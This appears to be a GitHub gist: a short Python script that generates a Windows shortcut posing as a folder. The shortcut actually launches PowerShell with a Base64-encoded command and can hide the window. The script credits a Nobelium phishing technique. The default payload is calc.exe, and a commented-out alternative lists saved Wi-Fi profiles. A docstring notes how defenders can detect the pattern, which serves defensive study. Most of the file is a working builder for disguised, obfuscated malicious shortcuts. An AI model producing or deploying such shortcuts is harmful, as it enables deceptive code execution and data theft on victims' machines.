Last active
August 4, 2021 16:02
Generates Windows Shortcuts that execute powershell commands while appearing as a folder.
# Generates Windows shortcuts that execute PowerShell commands while appearing as a folder.
# (Inspired by the technique used here: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/)
from win32com.client import Dispatch | |
import codecs, os | |
# Text handed to PowerShell for execution (encoded by makeshortcut before use).
COMMAND = "calc.exe"
# COMMAND = "netsh wlan show profiles"

# Shortcut target. The .lnk points at the PowerShell binary itself, so the
# target field of the saved shortcut names powershell.exe, not a folder.
BASEPATH = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'

# Full path to a .ico file used as the shortcut's icon. Left empty here.
# The icon is set independently of the target, so the two can disagree.
ICONPATH = ''

# When True, '-windowstyle hidden' is placed ahead of '-enc' in the
# shortcut's argument string.
HIDDEN = False
def makeshortcut(code):
    """Save ``EvilShortcut.lnk`` with PowerShell as target and *code* as its encoded argument.

    *code* is encoded to UTF-16LE and then Base64 (newlines stripped), which
    is the form PowerShell's ``-enc`` switch expects. The module-level
    ``HIDDEN`` flag decides whether ``-windowstyle hidden`` precedes ``-enc``.
    Target, arguments and icon come from ``BASEPATH``, the string built here,
    and ``ICONPATH`` respectively.

    Review note: the saved .lnk stores the powershell.exe target path and the
    full ``-enc <base64>`` argument string as ordinary shortcut fields, so
    both are readable by anything that parses the file. A shortcut whose
    target is PowerShell with an encoded argument, and whose icon does not
    come from that target, is the pattern to look for.
    """
    # Same two-step codec chain as before: str -> UTF-16LE bytes -> Base64
    # bytes. The base64 codec inserts line breaks, so they are removed.
    payload = codecs.encode(codecs.encode(code, 'utf-16-le'), 'base64').decode('utf-8').replace('\n', '')
    switches = '-windowstyle hidden -enc ' if HIDDEN else '-enc '
    args = switches + payload

    # WScript.Shell COM object; the relative file name is resolved by the
    # COM call (presumably against the current working directory).
    wsh = Dispatch('WScript.Shell')
    lnk = wsh.CreateShortCut('EvilShortcut.lnk')
    lnk.Targetpath = BASEPATH
    lnk.Arguments = args
    lnk.IconLocation = ICONPATH
    lnk.save()
# Runs at module level: the shortcut for the configured COMMAND is written
# as soon as this file is executed (or imported).
makeshortcut(COMMAND)